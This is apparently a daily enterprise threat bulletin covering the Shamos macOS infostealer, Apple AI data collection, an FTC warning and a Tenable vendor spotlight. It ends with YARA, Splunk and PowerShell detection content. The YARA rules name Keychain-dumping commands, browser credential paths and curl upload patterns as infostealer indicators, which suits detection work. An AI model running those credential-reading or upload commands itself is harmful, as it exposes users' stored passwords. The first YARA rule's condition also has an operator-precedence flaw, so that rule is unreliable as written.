Playbook for the Secure Enterprise

CyberSecurity Latest Rundown

The Apple Zero-Day appears to be currently a targeted effort, and older OT remains under attack. These are ongoing stories as we get into the weekend. Here's a detailed look at the current cybersecurity landscape for Saturday, August 23, 2025.

HIGH SEVERITY ITEMS

• New 'Shamos' Infostealer Malware Targets macOS Users via Fake Fixes

  Date & Time: 2025-08-23T13:17:51

  A new information-stealing malware named 'Shamos' is targeting macOS users through social engineering attacks. The malware, a variant of the Atomic macOS Stealer (AMOS), is distributed through malicious websites impersonating troubleshooting guides that trick users into running a malicious script. This threat underscores the growing trend of sophisticated malware targeting the Apple ecosystem, requiring heightened user awareness and endpoint protection.

  CVE Details: n/a

  Source: Lifeboat

• Apple Intelligence Gathering More User Data Than Expected, Research Finds

  Date & Time: 2025-08-22T19:47:24

  New analysis from Lumia Security indicates that Apple's AI features are collecting a broader range of personal data than previously understood, including location information and encrypted messages. While not a direct vulnerability, this extensive data collection raises significant privacy concerns and increases the potential impact of a future data breach. Security leaders should review corporate policies regarding the use of such features on company devices.

  CVE Details: n/a

  Source: Dark Reading

EXECUTIVE INSIGHTS

• FTC Warns Companies Against Weakening Data Security for Foreign Governments

  Date & Time: 2025-08-22T18:37:39

  The U.S. Federal Trade Commission has issued a stern warning to companies against weakening their data security or censorship standards at the behest of foreign powers. This policy statement places a clear expectation on U.S. companies to prioritize the security of American user data, even when faced with pressure from international markets. Executives and legal counsel should review this guidance to ensure their global operations and data handling policies align with FTC expectations, as non-compliance could lead to significant regulatory action.

  Source: FTC.gov, Hacker News Discussion

VENDOR SPOTLIGHT

• Spotlight Rationale: Tenable is selected due to their direct reporting on the FBI alert concerning Russian hackers exploiting a legacy Cisco vulnerability in industrial systems. This threat directly aligns with Tenable's core competency in exposure and vulnerability management, making their platform highly relevant for identifying and mitigating such risks.

  Threat Context: Cybersecurity Snapshot: Industrial Systems in Crosshairs of Russian Hackers

  Platform Focus: Tenable (Nessus, Tenable.io, Tenable.ot)

  Tenable's suite of products provides comprehensive vulnerability scanning and asset management crucial for defending against the threats highlighted today. Their platforms can identify outdated and vulnerable devices, such as the Cisco hardware mentioned in the FBI alert, across both IT and OT environments. By providing a unified view of the attack surface, Tenable enables organizations to prioritize patching for critical vulnerabilities like CVE-2025-43300 and legacy bugs before they can be exploited by threat actors.

  Actionable Platform Guidance: Security teams should use Tenable.io or Nessus to run authenticated scans specifically targeting their network infrastructure devices, using plugins designed to detect older, high-risk Cisco vulnerabilities. For industrial environments, Tenable.ot can be used to passively identify vulnerable assets without disrupting operations, helping to find and flag the specific devices targeted in the FBI alert.

  Source: Tenable

DETECTION & RESPONSE KIT

• ⚠️ Disclaimer: Test all detection logic in non-production environments before deployment.

  1. YARA Rule for 'Shamos' macOS Infostealer (Conceptual) then (General Purpose)

  [copy]

  rule macOS_infostealer_Shamos_variant {
  meta:
  description = "Detects potential Shamos infostealer artifacts, a variant of AMOS. This is a conceptual rule based on common infostealer behavior on macOS."
  author = "Threat Rundown"
  date = "2025-08-23"
  reference = "https://lifeboat.com/blog/2025/08/fake-mac-fixes-trick-users-into-installing-new-shamos-infostealer"
  strings:
  $keychain_access = "security find-generic-password" fullword ascii
  $chrome_db = "/Library/Application Support/Google/Chrome/Default/Login Data" fullword ascii
  $firefox_db = "/Library/Application Support/Firefox/Profiles/" fullword ascii
  $curl_upload = "curl -F 'file=@" ascii
  condition:
  uint32(0) == 0xfeedfacf or uint32(0) == 0xfeedface and 2 of them
  }

  [copy]

  rule macOS_Infostealer_Gen_ShamosAMOS_File_2025_08
  {
    meta:
      description = "Generic macOS infostealer traits (Keychain/Chromium/Firefox + exfil hints) — file scan"
      author = "Threat Rundown"
      date = "2025-08-23"
      confidence = "conceptual-general-purpose"
  
    strings:
      // Mach-O magic (64/32) and universal/fat magic
      $m1 = { CF FA ED FE }       // 0xfeedfacf
      $m2 = { CE FA ED FE }       // 0xfeedface
      $fat = { CA FE BA BE }      // FAT
  
      // Keychain/Apple Security API surface sometimes left in binaries
      $k1 = "kSecClassGenericPassword" ascii
      $k2 = "SecKeychainFindGenericPassword" ascii
  
      // Browser credential store paths (generalized home path)
      $c1 = /Users\/[^\/]+\/Library\/Application Support\/(Google\/Chrome|BraveSoftware|Microsoft Edge)\/[^\/]+\/Login Data/ ascii
      $f1 = /Users\/[^\/]+\/Library\/Application Support\/Firefox\/Profiles\/[^\/]+\.default(-release)?/ ascii
  
      // Exfil hints commonly hardcoded
      $x1 = /curl(\s|$)/ ascii nocase
      $x2 = "multipart/form-data" ascii nocase
      $x3 = "Content-Disposition: form-data; name=\"file\"; filename=" ascii nocase
  
    condition:
      // Bind Mach-O/FAT with parentheses to avoid precedence bugs
      (uint32(0) == 0xfeedfacf or uint32(0) == 0xfeedface or uint32(0) == 0xcafebabe)
      and
      // Require at least 3 behavioral indicators to reduce noise
      3 of ($k*,$c*,$f*,$x*)
  }

  2. SIEM Query — Detecting Unusual Inbound Connections to Network Gear

  [copy]

  // Splunk QL - Detects potential exploitation of network devices like the Cisco bug mentioned by the FBI
  (sourcetype=cisco:asa OR sourcetype=pan:traffic OR sourcetype=fortinet:ftnt_traffic)
  | iplocation src_ip
  | search Country!="United States" // Filter for your own country/region
  | stats count by src_ip, dest_ip, dest_port, Country
  | where dest_port IN (22, 23, 80, 443, 161) // Common management ports
  | lookup known_corporate_ip_ranges src_ip OUTPUT
  | where isnull(known_corporate_ip_ranges)
  | table src_ip, dest_ip, dest_port, Country, count
  | sort - count

  3. PowerShell Script — Hunt for Lateral Movement Indicators

  [copy]

  # Checks for common remote process execution events (Event ID 4688) that could indicate lateral movement.
  $lookbackHours = 24
  $startTime = (Get-Date).AddHours(-$lookbackHours)
  
  Write-Host "Searching for potential lateral movement indicators in the last $lookbackHours hours..."
  
  Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688; StartTime=$startTime} | ForEach-Object {
  $processName = $_.Properties[5].Value
  $creatorProcessName = $_.Properties[12].Value
  
  # Look for processes like PsExec.exe, wmic.exe, or powershell.exe being created by network services
  if (($processName -match "powershell.exe|wmic.exe|psexec.exe") -and ($creatorProcessName -match "services.exe|wininit.exe")) {
  Write-Warning "Potential Lateral Movement Detected!"
  [PSCustomObject]@{
  Time = $_.TimeCreated
  Process = $processName
  CreatorProcess = $creatorProcessName
  CommandLine = $_.Properties[8].Value
  Computer = $_.MachineName
  }
  }
  } | Format-Table

  This rundown should provide a solid overview of the current threat landscape. Thank you to all our cyberheroes for your diligence and hard work. Stay vigilant!